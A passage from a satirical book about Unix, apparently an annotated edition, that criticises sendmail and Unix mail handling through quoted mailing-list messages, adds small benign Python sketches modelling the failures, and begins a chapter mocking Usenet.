Hours later, a poor, innocent user asked me why she suddenly stopped getting e-mail in the last 48 hours. I round up the usual suspects, but after an hour between the man pages for sendmail and other lossage, I just give up. When I sent her a message, it disappeared. No barf, no error, just gone. Unlike most users, she gets and reads her mail on my workstation, with an account on the main Media Lab machine. Her name was in /etc/passwd, so there’s no need to bounce incoming mail with “unknown user” barf. Mailer looks in /etc/passwd before queuing up the mail. But when it actually came down to putting the message someplace on the computer like /usr/mail/, it couldn’t read past the blank line to identify the owner — never mind that it already knew the owner because it accepted the damn mail in the first place. So what did it do? Handle it the Unix way: Throw the message away without telling anyone and hope it wasn’t important!

So how did the extra blank line get there in the first place? I’m so glad you asked. This new user, who preceded the blank line, was added by a well-meaning colleague using ed3 from a terminal with
some non-standard environment variable set so he couldn't use Emacs or vi or any other screen editor, so he couldn't see there was an extra blank line that Unix would rather choke dead on than skip over.

³"Ed is the standard Unix editor." —Unix documentation (circa 1994).

From: <MAILER-DAEMON@berkeley.edu>

The problem with sendmail is that the sendmail configuration file is a rule-based expert system, but the world of e-mail is not logical, and sendmail configuration editors are not experts.

—David Waitzman, BBN

Beyond blowing established mail delivery protocols, Unix has invented newer, more up-to-date methods for ensuring that mail doesn't get to its intended destination, such as mail forwarding.

Suppose that you have changed your home residence and want your mail forwarded automatically by the post office. The rational method is the method used now: you send a message to your local postmaster, who maintains a centralized database. When the postmaster receives mail for you, he slaps the new address on it and sends it on its way to its new home.

There's another, less robust method for rerouting mail: put a message near your mailbox indicating your new address. When your mailman sees the message, he doesn't put your mail in your mailbox. Instead, he slaps the new address on it and takes it back to the post office. Every time. The flaws in this approach are obvious. For one, there's lots of extra overhead. But, more importantly, your mailman may not always see the message: maybe it's raining, maybe someone's trash cans are in front of it, maybe he's in a rush. When this happens, he misdelivers your mail into your old mailbox, and you never see it again unless you drive back to check or a neighbor checks for you.

Now, we're not inventing this stupider method: Unix did. That's why they call that note near your mailbox a .forward file. And it frequently happens, especially in these distributed days in which we live, that the mailer misses the forwarding note and dumps your mail where you don't want it.
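The .forward failure mode is easy to model. The sketch below is ours, not Unix's actual code; the function and file names are hypothetical, but the logic matches the behavior described here: the forwarding note lives in the user's home directory, so when that directory is unreachable the mailer quietly falls back to local delivery.

```python
# Hypothetical model of .forward handling; not the real sendmail code.
# The .forward file lives in the user's home directory, so if the file
# server holding home directories is down, the mailer cannot see the
# forwarding note and silently delivers into the local spool instead.

def delivery_target(user, home_dirs_available, forwards, spool="/usr/spool/mail"):
    """Return where a message addressed to `user` ends up."""
    if home_dirs_available and user in forwards:
        return forwards[user]          # honor ~user/.forward
    return f"{spool}/{user}"           # silent local delivery, no warning

# Normal day: mail is forwarded as requested.
assert delivery_target("alan", True, {"alan": "Alan@AI"}) == "Alan@AI"
# File server down: the very same call dumps mail in the local spool.
assert delivery_target("alan", False, {"alan": "Alan@AI"}) == "/usr/spool/mail/alan"
```

The point of the sketch is that nothing in the failure path reports an error: the fallback is indistinguishable, to the sender and recipient alike, from successful forwarding.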
So if you really don't want to learn how to read mail on a Unix, you use a .forward file:

Date: Thu, 6 Oct 88 22:50:53 EDT
From: Alan Bawden <alan@ai.mit.edu>
To: SUN-BUGS
Cc: UNIX-HATERS
Subject: I have mail?

Whenever I log into a Sun, it tells me that I have mail. I don't have a mailbox in my home directory on the Suns, but perhaps Unix keeps mailboxes elsewhere? I don't want to receive mail on a Unix. I want my mail to be forwarded to "Alan@AI," just as the .forward file in my home directory says to do. I also have the mail-address field in my inquir entry set to "Alan@AI." (I don't have a personal entry in the aliases file; do I need one of those in addition to the .forward file and the inquir entry?) If I send a test message to "alan@wheaties" it correctly finds its way to AI. Nevertheless, whenever I log into a Sun, I am told that I have mail.

So could someone either:

A. Find that mail and forward it to me, or

B. Tell me that I should just ignore the "You have mail" message, because in fact I don't have any mail accumulating in some dark corner of the file system, and fix it so that this never happens again.

Thanks.

The next day, Alan answered his own query:

Date: Fri, 7 Oct 88 14:44 EDT
From: Alan Bawden <alan@ai.mit.edu>
To: UNIX-HATERS
Subject: I have mail?

… (I don't have a personal entry in the aliases file; do I need one of those in addition to the .forward file and the inquir entry?)

Apparently the answer to this is "yes." If the file server that contains your home directory is down, the mailer can't find your .forward file, so mail is delivered into /usr/spool/mail/alan (or whatever). I guess the .forward file in your home directory is just a mechanism to make the behavior of the Unix mailer more unpredictable. You have to put a personal entry in the aliases file. I wonder what it does if the file server that contains the aliases file is down?

Not Following Protocol

Every society has rules to prevent chaos and to promote the general welfare. Just as a neighborhood of people sharing a street might be composed of people who came from Europe, Africa, Asia, and South America, a neighborhood of computers sharing a network cable often come from disparate places and speak disparate languages. And just as those people who share the street make up a common language for communication, the computers are supposed to follow a common language, called a protocol, for communication. There are published protocols. You can look them up in the computer equivalent of city hall: the RFCs.

This strategy generally works until either a jerk moves onto the block or a Unix machine is let onto the network. Both turn over trash cans, play the stereo too loudly, make life miserable for everyone else, and attract wimpy sycophants who bolster their lack of power by associating with the bully. Neither the jerk nor Unix follows the rules. We wish that we were exaggerating, but we're not. Then you can use Unix and verify lossage caused by Unix's unwillingness to follow protocol.

For example, an antisocial and illegal behavior of sendmail is to send mail to the wrong return address. Let's say that you send a real letter via the U.S. Postal Service that has your return address on it, but that you mailed it from the mailbox down the street, or you gave it to a friend to mail for you. Let's suppose further that the recipient marks "Return to sender" on the letter. An intelligent system would return the letter to the return address. An unintelligent system would return the letter to where it was mailed from, such as to the mailbox down the street or to your friend. That system mimicking a moldy avocado is, of course, Unix.

This seems only civilized, but the real story is a little more complicated, because you can ask your mail program to do tasks you could never ask of your mailman. For example, when responding to an electronic letter, you don't have to mail the return envelope yourself; the computer does it for you. Computers keep track not only of who a response should be sent to (the return address, called in computer parlance the "Reply-to:" field), but where it was mailed from (kept in the "From:" field). The computer rules clearly state that to respond to an electronic message one uses the "Reply-to" address, not the "From" address. Many versions of Unix flaunt this rule, wreaking havoc on the unsuspecting. Those who religiously believe in Unix think it does the right thing, misassigning blame for its bad behavior to working software, much as Detroit blames Japan when Detroit's cars can't compete.

For example, consider this sequence of events when Devon McCullough complained to one of the subscribers of the electronic mailing list called PAGANISM⁴ that the subscriber had sent a posting to the e-mail address PAGANISM-REQUEST@MC.LCS.MIT.EDU and not to the address PAGANISM@MC.LCS.MIT.EDU:

⁴Which has little relation to UNIX-HATERS.

From: Devon Sean McCullough <devon@ghoti.lcs.mit.edu>
To: <PAGANISM Digest Subscriber>

This message was sent to PAGANISM-REQUEST, not PAGANISM. Either you or your 'r' key screwed up here. Or else the digest is screwed up, using the 'From:' line instead. Anyway, you could try sending it again.

—Devon

The clueless weenie sent back the following message to Devon, complaining that the fault lied not with himself or sendmail, but with the PAGANISM digest itself:

Date: Sun, 27 Jan 91 11:28:11 PST
From: <Paganism Digest Subscriber>
To: Devon Sean McCullough <devon@ghoti.lcs.mit.edu>

>From my perspective, the digest is at fault. Berkeley Unix Mail is what I use, and it ignores the 'Reply-to:' line. So the only way for me to get the correct address is to either back-space over the dash and type the @ etc in, or save it somewhere and go thru some contortions to link the edited file to the old echoed address. Why make me go to all that trouble? This is the main reason that I rarely post to the PAGANISM digest at MIT.

The interpretation of which is all too easy to understand:

Date: Mon, 28 Jan 91 18:54:58 EST
From: Alan Bawden <alan@ai.mit.edu>
To: UNIX-HATERS
Subject: Depressing

Notice the typical Unix weenie reasoning here: "The digestifier produces a header with a proper Reply-To field, in the expectation that your mail reading tool will interpret the header in the documented, standard, RFC822 way." "Berkeley Unix Mail, contrary to all standards, and unlike all reasonable mail reading tools, ignores the Reply-To field and incorrectly uses the From field instead." Therefore: "The digestifier is at fault."

Frankly, I think the entire human race is doomed. We haven't got a snowball's chance of doing anything other than choking ourselves to death on our own waste products during the next couple hundred years.

It should be noted that this particular feature of Berkeley Mail has been fixed: Mail now properly follows the "Reply-To:" header if it is present in a mail message. On the other hand, the attitude that the Unix implementation is a more accurate standard than the standard itself continues to this day. The Internet Engineering Task Force (IETF) has embarked on an effort to rewrite the Internet's RFC "standards" so that they comply with the Unix programs that implement them.

>From Unix, with Love

We have laws against the U.S. Postal Service modifying the mail that it delivers. It can scribble things on the envelope, but it can't open it up and change the contents. But Unix feels regally endowed to change a message's contents. Yes, it's against the computer law, and Unix disregards the law. For example, did you notice the little ">" in the text of a previous message? We didn't put it there, and the sender didn't put it there. Sendmail put it there. It's pervasive, as pointed out in the following message:
Date: Thu, 9 Jun 1988 22:23 EDT
From: pgs@xx.lcs.mit.edu
To: UNIX-HATERS
Subject: mailer warts

Did you ever wonder how the Unix mail readers parse mail files? You see these crufty messages from all these losers out in UUCP land, and they always have parts of other messages inserted in them, with bizarre characters before each inserted line, to indicate that they're actually quoting the fifteenth preceding message in some interminable public conversation. Like this:

From Unix Weenie <piffle!padiddle!pudendum!weenie>
Date: Tue, 13 Feb 22 12:33:08 EDT
From: Unix Weenie <piffle!padiddle!pudendum!weenie>
To: net.lobotomies.soc.singles.wizards.unix.sf-lovers.laserlovers.astronomy.news.group

In your last post you meant to flame me but you clearly don't know what your talking about when you say

> >> %> $> Received: from magilla.uucp by gorilla.uucp
> >> %> $> via uunet with sendmail
> >> %> $> …

so think very carefully about what you say when you post
>From your home machien because when you sent that msg it went to all the people who dont want to read your falming so don't do it ):-(

Now! Why does that "From" on the second line of the preceding paragraph have an angle bracket before it? I mean, you might think it had something to do with the secret codes that Usenet Unix weenies use when talking to each other, but no, that angle bracket was put there by the mailer. Mostly, you see, the mail reading program parses mail files by looking for lines beginning with "From." So the mailer has to mutate text lines beginning with "From" so's not to confuse the mail readers.

The reason for ">From" comes from the way that the Unix mail system distinguishes between multiple e-mail messages in a single mailbox (which, following the Unix design, is just another file). This is a very important point, so it bears repeating. Instead of using a special control sequence, or putting control information into a separate file, or putting a
special header at the beginning of the mail file, Unix assumes that any line beginning with the letters F-r-o-m followed by a space (" ") marks the beginning of a new mail message. For this reason, sendmail searches out lines that begin with "From " and changes them to ">From."

Now, you might think this is a harmless little behavior, like someone burping loudly in public. But sometimes those burps get enshrined in public papers whose text was transmitted using sendmail. Different text preparation systems do different things with the ">" character. LaTeX, for example, turns it into an upside-down question mark (¿). If you don't believe us, obtain the paper "Some comments on the assumption-commitment framework for compositional verification of distributed programs" by Paritosh Pandya, in "Stepwise Refinement of Distributed Systems," Springer-Verlag, Lecture Notes in Computer Science no. 430, pages 622–640. Look at pages 626, 630, and 636: three paragraphs start with a "From" that is prefixed with a ¿.

Using bits that might be contained by e-mail messages to represent information about e-mail messages is called inband communication, and anybody who has ever taken a course on telecommunications knows that it is a bad idea. The reason that inband communication is bad is that the communication messages themselves sometimes contain these characters. Sendmail even mangles mail for which it isn't the "final delivery agent," that is, mail destined for some other machine that is just passing through some system with a sendmail mailer. For example, just about everyone at Microsoft uses a DOS or Windows program to send and read mail. Yet internal mail gets goosed with those ">Froms" all over the place. Why? Because on its hop from one DOS box to another, mail passes through a Unix-like box and is scarred for life. The recipient believes that the message was already proofread by the sender.

So what happens when you complain to a vendor of electronic mail services (whom you pay good money to) that his machine doesn't follow protocol, that it is breaking the law? Jerry Leichter complained to his vendor and got this response:

Date: Tue, 24 Mar 92 22:59:55 EDT
From: Jerry Leichter <leichter@lrw.com>
To: UNIX-HATERS
Subject: That wonderful ">From"

From: <A customer service representative>⁵
I don't and others don't think this is a bug. I have sent test messages from machines running the latest software, and it appears it is Unix's way of handling it. If you can come up with an RFC that states that we should not be doing this I'm sure we will fix it. As my final note, here is a section from rfc976: [deleted] I have brought this to the attention of my supervisors as I stated before. Until then this is my last reply.

I won't include that wonderful quote, which nowhere justifies a mail forwarding agent modifying the body of a message; it simply says that "From" lines and ">From" lines, wherever they might have come from, are members of the syntactic class From_Lines. Nothing about >'s. Using typical Unix reasoning, since it doesn't specifically say you can't do it, it must be legal. I recently dug up a July 1982 RFC draft for SMTP. It makes it clear that messages are to be delivered unchanged, with certain documented exceptions, and it mentions that such lines exist. I think I need to scream. Here we are 10 years later, and not only is it still wrong, at a commercial system that charges for its services, but those who are getting it wrong can't even SEE that it's wrong.

⁵This message was returned to a UNIX-HATER subscriber by a technical support representative at a major Internet provider. We've omitted that company's name, not in the interest of protecting the guilty, but because there was no reason to single out this particular company: the notion that "sendmail is always right" is endemic among all of the Internet service providers.

uuencode: Another Patch, Another Failure

You can tell those who live on the middle rings of Unix Hell from those on lower levels. Those in the middle levels know about >From lossage but think that uuencode is the way to avoid problems. Uuencode encodes a file using only 7-bit characters, instead of 8-bit characters that Unix mailers or network systems might have difficulty sending. The program uudecode decodes a uuencoded file to produce a copy of the original file. A uuencoded file is supposedly safer to send than plain text: ">From" distortion can't occur to such a file, right? Unfortunately, Unix mailers have other ways of screwing users to the wall:
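The specific failure the adjacent war story describes, trailing blanks stripped from uuencoded lines in transit, can be reproduced directly with Python's standard-library uuencode routines. This demonstration is ours, not from the book; note that modern decoders build in exactly the hand-repair the victim had to perform (assume the eaten trailing characters were spaces, i.e., zero bits).

```python
import binascii

# uuencode maps each 6-bit group to chr(32 + value), so a zero group
# becomes an ASCII space -- including at the end of a line.
line = binascii.b2a_uu(b"A\x00\x00")   # default backtick=False: zeros -> spaces
assert line == b"#00  \n"              # '#' = length 3; two trailing spaces

# A mailer that "thoughtfully" strips trailing blanks truncates the line:
stripped = line.rstrip()               # b"#00"

# Python's decoder assumes the missing characters were spaces, which is
# the same repair as hand-padding the short lines back to full length:
assert binascii.a2b_uu(stripped) == b"A\x00\x00"
```

A decoder without that workaround has no way to distinguish "data that ends in zero bytes" from "data mutilated by a mailer," which is why the encoding's use of the space character was a poor design choice.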
Date: Tue, 4 Aug 92 16:07:47 HKT
From: "Olin G. Shivers" <shivers@csd.hku.hk>
To: UNIX-HATERS
Subject: Need your help

Many Unix mailers thoughtfully strip trailing blanks from lines of mail. The idiot program uses ASCII spaces in its encoding; strings of nuls map to strings of blanks. This nukes your carefully-encoded data. Well, what did you expect? It's Unix. Of course you can grovel over the data, find the lines that aren't the right length, and re-pad with blanks; that will (almost certainly?) fix it up. What else is your time for anyway, besides cleaning up after the interactions of multiple brain-damaged Unix so-called "utilities?"

Just try and find a goddamn spec for uuencoded data sometime. In the man page? Hah. Go read the source: that's the "spec." I particularly admire the way uuencode insists on creating a file for you, instead of working as a stdio filter. Instead of piping into tar, which knows about creating files, and directories, and file permissions, and so forth, we build a half-baked equivalent functionality directly into uuencode so it'll be there whether you want it or not. And I really, really like the way uuencode by default makes files that are world writable. Anybody who thinks that uuencode protects a mail message is living in a pipe dream. Maybe it's Unix fighting back.

No way, you might be saying. But this precise bug hit one of the editors of this book after editing in this message in April 1993: someone mailed him a uuencoded PostScript version of a conference paper, and fully 12 lines had to be hand-patched to put back trailing blanks before uudecode reproduced the original file.

Error Messages

The Unix mail system knows that it isn't perfect, and it is willing to tell you so. But it doesn't always do so in an intuitive way. Here's a short listing of the error messages that people often witness:

550 chiarell… User unknown: Not a typewriter
550 <bogus@ASC.SLB.COM>… User unknown: Address already in use
550 zhang@uni-dortmund.de… User unknown: Not a bicycle
553 abingdon… I refuse to talk to myself
554 "| filter -v"… unknown mailer error 1
554 "| /usr/new/lib/mh/slocal -user $USER"… unknown mailer error 1
554 Too many recipients for no message body

"Not a typewriter" is sendmail's most legion error message. We figure that the error message "not a bicycle" is probably some system administrator's attempt at humor. The message "Too many recipients for no message body" is sendmail's attempt at Big Brotherhood: it thinks it knows better than the proletariat masses, and it won't send a message with just a subject line.

Unix zealots who think that mail systems are complex and hard to get right are mistaken. Nothing was wrong with mail systems until Unix came along and broke things in the name of "progress." Mail used to work, and work highly reliably. The conclusion is obvious: you are lucky to get mail at all or to have messages you send get delivered.

Date: Tue, 9 Apr 91 22:34:19 -0700
From: Alan Borning <borning@cs.washington.edu>
To: UNIX-HATERS
Subject: the vacation program

So I went to a conference the week before last and decided to try being a Unix weenie. I should have known better. I set up a "vacation" message. (The vacation program has a typical Unix interface, involving creating a .forward file with an obscure incantation in it, a .vacation.msg file with a message in it, etc.) I decided to test it by sending myself a message, thinking that surely they would have allowed for this and prevented an infinite sending of vacation messages. A test message… Well, a quick peek at the mail box… bingo: 59 messages already. It must be working. There is also some -l initialization option, which I couldn't get to work, which is supposed to keep the vacation replies down to one per week per sender.
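The once-per-week throttle that the -l option is supposed to provide fits in a few lines; the sketch below is our own rendering of the idea, not vacation(1)'s actual code (which keeps its state in a dbm file rather than a dictionary). Note that the throttle by itself does nothing about the self-reply loop described above: replying to your own test message is allowed once, which is one auto-reply more than you wanted.

```python
# Hypothetical sketch of vacation(1)'s per-sender rate limit:
# reply at most once per week per sender.
ONE_WEEK = 7 * 24 * 60 * 60   # seconds

def should_reply(sender, last_reply, now):
    """Return True (and record the time) if `sender` hasn't been
    answered within the past week; otherwise stay silent."""
    last = last_reply.get(sender)
    if last is not None and now - last < ONE_WEEK:
        return False
    last_reply[sender] = now
    return True

seen = {}
assert should_reply("straz", seen, now=0)                # first message: reply
assert not should_reply("straz", seen, now=3600)         # an hour later: silent
assert should_reply("straz", seen, now=8 * 24 * 3600)    # next week: reply again
```

A loop-safe implementation would also refuse to reply to daemons, mailing lists, and the user's own address; the throttle alone merely slows an infinite exchange down to one round per week.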
However, the really irksome thing about this program is the standard vacation message format. From the man page:

From: eric@ucbmonet.berkeley.edu (Eric Allman)
Subject: I am on vacation
Delivered-By-The-Graces-Of: the Vacation program
…

Depending on one's theology and politics, a message might be delivered by the grace of some god or royal personage, but never by the grace of Unix. The very concept is an oxymoron.

Apple Computer's Mail Disaster of 1991

In his 1985 USENIX paper, Eric Allman writes that sendmail is phenomenally reliable because any message that is accepted is eventually delivered to its intended recipient, returned to the original sender, logged to a file, sent to the system's postmaster, or, in absolute worst case, sent to the root user. Certainly, lost mail is a bad thing. Allman then goes on to note that "A major component of reliability is the concept of responsibility." He continues:

For example, before sendmail will accept a message (by returning exit status or sending a response code) it insures that all information needed to deliver that message is forced out to the disk. In this way, sendmail has "accepted responsibility" for delivery of the message (or notification of failure). If the message is lost prior to acceptance, it is the "fault" of the sender. On the other hand, if lost after acceptance, it is the "fault" of the receiving sendmail.

This algorithm implies that a window exists where both sender and receiver believe that they are "responsible" for this message. If a failure occurs during this window then two copies of the message will be delivered. This is normally not a catastrophic event, and is far superior to losing a message. This design choice to deliver two copies of a message rather than none at all might indeed be far superior in most circumstances. Certainly, techniques for guaranteeing synchronous, atomic operations, even for processes running on two separate computers, were known and understood in 1983 when sendmail was written.

Date: Thu, 09 May 91 23:26:50 -0700
From: "Erik E. Fair"⁶ (Your Friendly Postmaster) <fair@apple.com>
To: tcp-ip@nic.ddn.mil, unicode@sun.com
Subject: Case of the Replicated Errors: An Internet Postmaster's Horror Story

This Is The Network: The Apple Engineering Network. It supports almost 10,000 users every day. It stretches from Tokyo, Japan, to Paris, France, with half a dozen locations in the U.S., and 40 buildings in the Silicon Valley. The Apple Engineering Network has about 100 IP subnets, 224 AppleTalk zones, and over 600 AppleTalk networks. It is interconnected with the Internet in three places: two in the Silicon Valley, and one in Boston. When things go wrong with e-mail on this network, it's my problem. My name is Fair. I carry a badge.

⁶Erik Fair graciously gave us permission to reprint this message, which appeared on the TCP-IP, UNICODE, and RISKS mailing lists, although he added: "I am not on the UNIX-HATERS mailing list.
I do not hate Unix. I just hate USL, Sun, HP, and all the other vendors who have made Unix FUBAR."

[insert theme from Dragnet]

The story you are about to read is true. The names have not been changed so as to finger the guilty.

It was early evening, on a Monday. I was working the swing shift out of Engineering Computer Operations under the command of Richard Herndon. I don't have a partner.

While I was reading my e-mail that evening, I noticed that the load average on apple.com, our VAX-8650, had climbed way out of its normal range to just over 72. Upon investigation, I found that thousands of Internet hosts⁷ were trying to send us an error message. I also found 2,500 copies of this error message already in our queue. I immediately shut down the sendmail daemon which was offering SMTP service on our VAX. I examined the error message, and reconstructed the following sequence of events:

We have a large community of users who use QuickMail, a popular Macintosh based e-mail system from CE Software. In order to make it possible for these users to communicate with other users who have chosen to use other e-mail systems, ECO supports a QuickMail to Internet e-mail gateway. The gateway that we installed for this purpose is MAIL*LINK SMTP from Starnine Systems. This product is also known as GatorMail-Q from Cayman Systems. It does gateway duty for all of the 3,500 QuickMail users on the Apple Engineering Network. We use RFC822 Internet mail format, and RFC821 SMTP as our common intermediate e-mail standard, to promote interoperability, and we gateway everything that we can to that standard. Many of our users subscribe, through this gateway, to Internet mailing lists which are delivered to them. One such user, Mark E. Davis, is on the unicode@sun.com mailing list.

Sometime on Monday, he replied to a message that he received from the mailing list. He composed a one paragraph comment on the original message, to discuss some alternatives to ASCII with the other members of that list, and hit the "send" button. Somewhere in the process of that reply, either QuickMail or MAIL*LINK SMTP mangled the "To:" field of the message. The important part is that the "To:" field contained exactly one "<" character, without a matching ">" character. Note that this syntax error in the "To:" field has nothing whatsoever to do with the actual recipient list, which is handled separately, and which, in this case, was perfectly correct.

The message made it out of the Apple Engineering Network, and over to Sun Microsystems, where it was exploded out to all the recipients of the unicode@sun.com mailing list. I don't know how many people are on the unicode@sun.com mailing list. I speculate that the list has at least 200 recipients, and about 25% of them are actually UUCP sites that are MX'd on the Internet.

This minor point caused the massive devastation, because it interacted with a bug in sendmail. Sendmail, arguably the standard SMTP daemon and mailer for UNIX, doesn't like "To:" fields which are constructed as described. What it does about this is the real problem: it sends an error message back to the sender of the message, AND delivers the original message onward to whatever specified destinations are listed in the recipient list. This is deadly. The effect was that every sendmail daemon on every host which touched the bad message sent an error message back to us about it. I have often dreaded the possibility that one day, every host on the Internet (all 400,000 of them⁸) would try to send us a message, all at once. On Monday, we got a taste of what that must be like.

After I turned off our SMTP daemon, our secondary MX sites got whacked. We have a secondary MX site so that when we're down, someone else will collect our mail in one place, and deliver it to us in an orderly fashion, rather than have every host which has a message for us jump on us the very second that we come back up. Our secondary MX is the CSNET Relay (relay.cs.net and relay2.cs.net). It seems that for every one machine that had successfully contacted apple.com and delivered a copy of that error message, there were three hosts which couldn't get ahold of apple.com because we were overloaded from all the mail, and so they contacted the CSNET Relay instead. They eventually destroyed over 11,000 copies of the error message in the queues on the two relay machines. Their postmistress was at wit's end when I spoke to her. She wanted to know what had hit her machines.

I also heard from CSNET that UUNET, a major MX site for many other hosts, had destroyed 2,000 copies of the error message. I presume that their modems were very busy delivering copies of the error message from outlying UUCP sites back to us at Apple Computer. I destroyed about 4,000 copies of the error message in our queues here at Apple Computer.

The next day, I replaced the current release of MAIL*LINK SMTP with a beta test version of their next release. It has not shown the header mangling bug.

The final chapter of this horror story has yet to be written. The versions of sendmail with this behavior are still out there on hundreds of thousands of computers, waiting for another chance to bury some unlucky site in error messages. This instantiation of this problem has abated for the moment, but I'm still spending a lot of time answering e-mail queries from postmasters all over the world: I've heard from Postmasters in Sweden, Korea, Australia, France, Britain, Japan, and all over the U.S.

Are you next?

[insert theme from "The Twilight Zone"]

just the vax, ma'am,
Erik E. Fair
fair@apple.com

⁷Erik identifies these machines simply as "Internet hosts," but you can bet your cookies that most of them were running Unix.
⁸There are now more than 2,000,000 hosts.
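The acceptance window Allman describes (the root of sendmail's deliver-twice-rather-than-never behavior) can be modeled in a few lines. This is our own toy model, not sendmail's code: the receiver commits the message to its spool before acknowledging, so a lost acknowledgment causes the sender to retransmit, and the message arrives twice.

```python
# Toy model of "accepted responsibility": the receiver stores the
# message durably *before* acknowledging. If the ack is lost, both
# sides believe they are responsible, the sender retries, and two
# copies are delivered -- at-least-once delivery, never zero.
spool = []

def receive(msg):
    spool.append(msg)   # stand-in for "forced out to the disk"
    return True         # the acknowledgment back to the sender

def send(msg, ack_lost=False):
    acked = receive(msg)
    if ack_lost or not acked:
        receive(msg)    # sender still feels responsible: retransmit

send("hello")
send("world", ack_lost=True)
assert spool == ["hello", "world", "world"]   # a duplicate, not a loss
```

Eliminating the window entirely requires an atomic commitment protocol between the two machines, which, as the chapter notes, was understood well before sendmail was written; the duplicate is the price of the simpler design.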
5 Snoozenet

I Post, Therefore I Am

"Usenet is a cesspool, a dung heap."

—Patrick A. Townson

We're told that the information superhighway is just around the corner. Nevertheless, we already have to deal with the slow-moving garbage trucks clogging up the highway's arteries. These trash-laden vehicles are NNTP packets and compressed UUCP batches, shipping around untold gigabytes a day of trash. This trash is known, collectively, as Usenet.

Netnews and Usenet: Anarchy Through Growth

In the late 1970s, two graduate students in North Carolina set up a telephone link between the machines at their universities (UNC and Duke) and wrote a shell script to exchange messages. Unlike mail, the messages were stored in a public area where everyone could read them. The software came to be called "news," because the intent was that people (usually graduate students) at most Unix sites (usually universities) would announce their latest collection of hacks and patches. Over time the term "netnews" came into use, and from that came "Usenet" and its legions of mutilations (such as "Abusenet," "Snoozenet," "Lusenet," and "Net of a Million Lies."¹)

¹From A Fire Upon the Deep by Vernor Vinge (Tom Doherty Associates, 1992).

The basic problem with Usenet was that of scaling. Posting a message at any computer sent a copy of it to every single system on the fledgling network. Every time a new site came on the network, every message posted by everybody at that site was automatically copied to every other computer on the network, propagating the virus. The network grew like kudzu: more sites, more people, and more messages. One computer in New Hampshire was rumored to have a five-digit monthly phone bill before DEC wised up and shut it down. The exorbitant costs were easily disguised as overhead, bulking up the massive spending on computers in the 1980s, which was completely subsidized by the federal deficit.

Around that time, a group of hackers devised a protocol for transmitting Usenet over the Internet. Capacity increased and Usenet truly came to resemble a million monkeys typing endlessly all over the globe. In early 1994, there were an estimated 140,000 sites with 4.6 million users generating 43,000 messages a day.

Defenders of the Usenet say that it is a grand compact based on cooperation. What they don't say is that it is also based on name-calling, harassment, and letter-bombs.

Death by Email

How does a network based on anarchy police itself? Mob rule and public lynchings. Observe:

Date: Fri, 10 Jul 92 13:11 EDT
From: nick@lcs.mit.edu
To: VOID, FEATURE-ENTENMANNS, UNIX-HATERS
Subject: Splitting BandyHairs on LuseNet

The news.admin newsgroup has recently been paralyzed (not to say it was ever otherwise) by an extended flamefest involving one bandy@catnip.berkeley.ca.us, who may be known to some of you.
Apparently, he attempted to reduce the amount of noise on Lusenet by implementing a program that would cancel articles crossposted to alt.cascade. (A “cascade” is an affectionate term for a sequence of messages quoting earlier messages and adding little or no content; the resulting repeated indent, nugget of idiocy, and terminating exdent is evidently favored by certain typographically-impaired people.) Bandy’s implementation of this (arguably worthy) idea contained a not-so-subtle bug that caused it to begin cancelling articles that were not cascades, and it deep-sixed about 400 priceless gems of net.wisdom before anyone could turn it off. He admitted his mistake in a message sent to the nntp-managers mailing list (what remains of the UseNet “cabal”) but calls for him to “publicly apologize” continue to reverberate. Someone cleverly forwarded his message from nntp-managers to news.admin (which contained his net address), and someone (doubtless attempting to prevent possible sendsys bombing of that address) began cancelling all articles which mentioned the address… Ah, the steely clashes of metaphor upon metaphor are music to the ears of the true connoisseur of network psychology. All in all, a classic example of Un*x and UseNet lossage: idiocy compounded upon idiocy in an ever-expanding spiral.

Most of us just add the perpetrator (“perp” in the jargon) to our kill files. Regrettably, I am sorry to (publicly) admit that I succumbed to the temptation to throw in my $.02:

    Newsgroups: news.admin
    Subject: Splitting BandyHairs
    Distribution: world

    I’m glad we have nntp-managers for more-or-less reasonable
    discussion of the problems of running netnews. But as long as
    we’re wasting time and bandywidth here on news.admin: People
    who have known the perp (God, I hate that word) also know that
    he’s been, well, impulsive in the past. And has paid dearly for
    his rashness. (What, you mean sitting in a bathtub yelling
    “Be careful with that X-Acto blade!” isn’t punishment enough?
    For anything?) Some say that sordid episode should remain
    unchronicled (even by the ACM—especially by the ACM). He’s been
    punished enough.
Let you who is without sin cast the first stone. People complain about “lazy or inattentive sysadmins,” though Bandy has been plastered. One look at news.admin and you’ll instantly understand why it’s mostly a waste of time.

—nick

Newsgroups

So far we haven’t actually said what Usenet is; that is, we haven’t said how you can tell if a computer system is or isn’t a part of it. That’s because nobody really can say. The best definition might be this: if you receive some newsgroups somehow, and if you can write messages that others can read, then you’re a part of Usenet. Once again, the virus analogy comes to mind: once you touch it, you’re infected, and you can spread the infection.

What’s a newsgroup? Theoretically, newsgroups are the Dewey Decimal System of Usenet. A newsgroup is a period-separated set of words (or common acronyms or abbreviations) that is read from left to right. For example, misc.consumers.house is the newsgroup for discussions about owning or buying a house and sci.chem.organomet is for discussion of organometallic chemistry. The left-most part of the name is called the hierarchy, or sometimes the top-level hierarchy. In written messages, the name parts are often abbreviated to a single letter when the context is clear, so a discussion about comp.unix might use the term “c.u.” (By the way, you pronounce the first period in the names so that “comp.foo” is pronounced “comp-dot-foo.”) Usenet is international, and while most groups have English names, users may bump into gems like finet.freenet.oppimiskeskus.ammatilliset.oppisopimus, whatever that is.

One section of Usenet called “alt” is like the remainder bin at a book or record store, or the open shelf section of a company library—you never know what you might find, and it rarely has value. None of LuseNet is cast in concrete, so a fan of the Muppets with a puckish sense of humor once created alt.swedish.chef.bork.bork.bork. As is typical with Unix weenies, they sort of figured out the pattern, and you can now find the following on some sites:

    alt.alien.vampire.flonk.flonk.flonk
    alt.andy.whine.whine.whine
    alt.barney.dinosaurs.die.die.die
    alt.tv.90210.sucks
    alt.bob-packwood.tongue.tongue.tongue
    alt.american.automobile.breakdown.breakdown.breakdown

As you can see, the joke wears thin rather quickly.

Hurling Hierarchies

Usenet originally had two hierarchies, net and fa. The “fa” stood for from ARPANET and was a way of receiving some of the most popular ARPANET mailing lists as netnews.2 The “fa” groups were special in that only one site (an overloaded DEC VAX at UCB that was the computer science department’s main gateway to the ARPANET) was authorized to post the messages.

The software was changed to forward a message posted to a moderated group to the group’s “moderator” (specified in a configuration file) who would read the message, check it out to some degree, and then repost it. To repost, the moderator added a header that said “Approved” with some text, typically the moderator’s address. Of course, anyone can forge articles in moderated groups, if only because it is so easy to do so: there is little challenge in breaking into a safe where the combination is written on the door. Not that that stops anyone on the Usenet. This does not happen too often. Moderated groups were the first close integration of mail and news. This concept became very useful, so a later release of the Usenet software renamed the fa hierarchy to mod, where “mod” stood for moderated.

